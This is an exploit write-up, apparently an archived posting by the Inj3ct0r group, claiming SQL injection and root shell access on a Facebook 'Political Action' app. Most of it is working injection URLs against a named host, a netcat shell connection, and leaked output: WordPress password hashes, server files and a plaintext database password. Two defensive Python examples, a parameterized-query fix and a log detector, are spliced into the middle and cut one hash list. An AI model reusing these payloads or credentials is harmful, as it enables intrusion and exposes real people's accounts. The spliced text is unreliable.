Facebook Political Action SQL Injection

Facebook Political Action SQL Injection
Posted Jul 20, 2010
Authored by Inj3ct0r

The Facebook Political Action application suffers from a remote SQL injection vulnerability that can in turn result in a full shell.

tags | exploit, remote, shell, sql injection
SHA-256 | 82c14ab9c9953a579378b5653467e8fbada6cb78c2bb527ce3aa13b46d034d50

====================================================
FaceBook's servers was hacked again by Inj3ct0r Team
====================================================



Part 1 Original: http://inj3ct0r.com/exploits/11638

Part 2 Original: http://inj3ct0r.com/exploits/13403


[+] English translation
Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com


[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]


[0x00] [Introduction]




In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private so that they can be analyzed by the proper authorities and the loopholes in the system closed.

We did not change the main page, did not sell the backup server and did not delete files.

We have demonstrated the flaw in the system. Start =] ..



oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and finding vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo



[0x01] [Search for bugs / crash]



inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com

...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..

[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...

Brevity is the soul of wit..


inj3ct0r.com@mybox [~]

inj3ct0r.com@host [~]# cd /home

inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com

...attack starting . . . . . . . . . .. . . .. . . . ..

[0x02] [0wner]

Successful Shell on 31337 port . . . . .

inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337

...............................................................


apps.facebook@host [~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


-[0x33]- Proofs


############
# REQUESTS #
############

;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1
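Every request in this section has the same shape: the `issueid` value is closed off with `and 1=2`, a `UNION SELECT` with a matching column count is appended, and `--` comments out whatever followed in the original query. That only works because the application spliced the raw parameter into the SQL text. The following is an added example, not code from the advisory or from the Political Action application, that reproduces the defect and its fix in Python against a constructed in-memory SQLite database (table names `issue` and `wp_users` and all rows are made up; SQLite's `||` stands in for MySQL's `concat()`):

```python
import sqlite3


def build_db():
    """Constructed stand-in for the two tables the injected UNION bridges:
    the application's own issue table and a WordPress user table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE issue (issueid INTEGER, title TEXT, body TEXT, votes INTEGER);
        INSERT INTO issue VALUES (1, 'Healthcare', 'Issue text', 42);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$B-constructed-hash');
    """)
    return db


def get_issue_vulnerable(db, issueid):
    # Presumed pattern behind issue.php (assumption, the source is not on the
    # page): the query-string value is concatenated into the SQL text, so
    # 'and 1=2 UNION SELECT ...' is parsed as SQL rather than as an id.
    sql = "SELECT issueid, title, body, votes FROM issue WHERE issueid=" + issueid
    return db.execute(sql).fetchall()


def get_issue_hardened(db, issueid):
    # Two independent defences: reject anything that is not a decimal integer
    # before it reaches the database, and bind the value as a parameter so the
    # SQL text is fixed regardless of input. Either one alone stops the UNION.
    if not isinstance(issueid, str) or not issueid.isdigit():
        raise ValueError("issueid must be a decimal integer")
    sql = "SELECT issueid, title, body, votes FROM issue WHERE issueid=?"
    return db.execute(sql, (int(issueid),)).fetchall()


# The advisory's payload shape, rewritten for SQLite: the trailing '-- 1'
# mirrors the '--+1' comment tail in the URLs above.
PAYLOAD = "1 and 1=2 UNION SELECT 1,user_login||':'||user_pass,3,4 FROM wp_users-- 1"


def demo():
    """Returns what the vulnerable handler leaks and whether the hardened
    handler refused the same input."""
    db = build_db()
    leaked = get_issue_vulnerable(db, PAYLOAD)
    try:
        get_issue_hardened(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, refused = demo()
    print("vulnerable handler returned:", rows)
    print("hardened handler refused payload:", refused)
```

The integer check is what makes the parameterized query worth having here: a bound parameter stops the value from being parsed as SQL, and the type check stops the request before a database round trip, which is also the point at which a defender would log it.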

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz
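The requests above leave a distinctive trace in a web server's access log: strings are hidden as MySQL `0x..` hex literals (`0x6d7973716c` is `mysql`) or built with `CHAR(32,58,32)`, `information_schema` is enumerated, and each URL ends in a `--` comment. Below is an added detection example, not part of the advisory, that normalizes a request's query string back to plain text and scores it against those indicators. The log lines are constructed for the example; the first two copy the request shape from this page, the last two are benign, and the `search.php` path and `q` parameter are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format, made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2010:10:01:02 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Jul/2010:10:01:09 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c--+1 HTTP/1.1" 200 9001
10.0.0.7 - - [20/Jul/2010:10:02:00 +0000] "GET /politicalaction/issue.php?issueid=7 HTTP/1.1" 200 4800
10.0.0.8 - - [20/Jul/2010:10:02:30 +0000] "GET /politicalaction/search.php?q=union+of+concerned+scientists HTTP/1.1" 200 3200
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LIT_RE = re.compile(r'0x([0-9a-f]{2}(?:[0-9a-f]{2})*)\b')
CHAR_RE = re.compile(r'char\(([\d,\s]+)\)')


def normalize(query):
    """Undo the layers used to disguise the payload: URL encoding and '+'
    spaces (applied twice for double-encoded input), then MySQL 0x hex
    literals and CHAR(n,n,...) sequences, lowercased and space-collapsed."""
    text = unquote_plus(unquote_plus(query)).lower()
    text = HEX_LIT_RE.sub(lambda m: bytes.fromhex(m.group(1)).decode('latin-1'), text)
    text = CHAR_RE.sub(lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',')), text)
    return re.sub(r'\s+', ' ', text)


# Each indicator on its own is weak; the combination is what characterizes
# UNION-based extraction like the requests on this page.
INDICATORS = [
    ("union_select", re.compile(r'\bunion\s+(?:all\s+)?select\b')),
    ("schema_enum", re.compile(r'\binformation_schema\.')),
    ("tautology_toggle", re.compile(r'\b(?:and|or)\s+1\s*=\s*[12]\b')),
    ("comment_tail", re.compile(r'--\s')),
    ("string_concat", re.compile(r'\bconcat(?:_ws)?\(')),
]


def scan_log(log_text):
    """Return (line number, path, matched indicators, normalized query) for
    every request that trips at least two indicators."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m or '?' not in m.group(1):
            continue
        path, _, query = m.group(1).partition('?')
        norm = normalize(query)
        hits = [name for name, rx in INDICATORS if rx.search(norm)]
        # Two independent indicators are required so that a single word such
        # as 'union' in an ordinary search term does not raise an alert.
        if len(hits) >= 2:
            findings.append((lineno, path, hits, norm))
    return findings


if __name__ == "__main__":
    for lineno, path, hits, norm in scan_log(SAMPLE_LOG):
        print(f"line {lineno} {path}: {', '.join(hits)}")
        print("  decoded:", norm)
```

Decoding the hex and `CHAR()` literals before matching is the step that matters: a rule that looks for the string `mysql` or `information_schema` in the raw URL never sees it, while the decoded form exposes both the target schema names and the `user():database():version()` probe.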

###############
# INFORMATION #
###############
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1

log-bin=/var/lib/mysqllogs/bin-log

binlog-do-db=fluff2

expire-logs-days=14



server-id = 2



#master-host=69.63.180.15

#master-user=tomkincaid_user

#master-password=tomkincaid123

#master-connect-retry=50

replicate-do-db=miserman


#log-slave-updates

expire_logs_days = 14


goOd =] Nice Hacking old school xD


[0x03] [Conclusion]



There's no 100% security! Be safe my friends! Watch for vulnerabilities and update promptly! Watch for updates at Inj3ct0r.com (Inj3ct0r Exploit Database)



[0x04] [Greetz]



Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!

31337 Inj3ct0r Members:

cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,

Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..

----------------------------------------------------------------------------------------------

Personally h4x0rz:
Sir Zaid (none)
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346

You are good hackers. Respect y0u!


Sir Zaid, thank you for pushing me to write this article and for reporting the dependence! Personal Respect to you from Inj3ct0r Team!

Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]

At the time of publication, all requests work! Attached images : inj3ct0r.com/facebook_part2.zip

We want to thank the following people for their contribution.

Do not forget to keep track of vulnerabilities in Inj3ct0r.com

H.A.C.K.T.I.V.I.S.M. WIN! =]
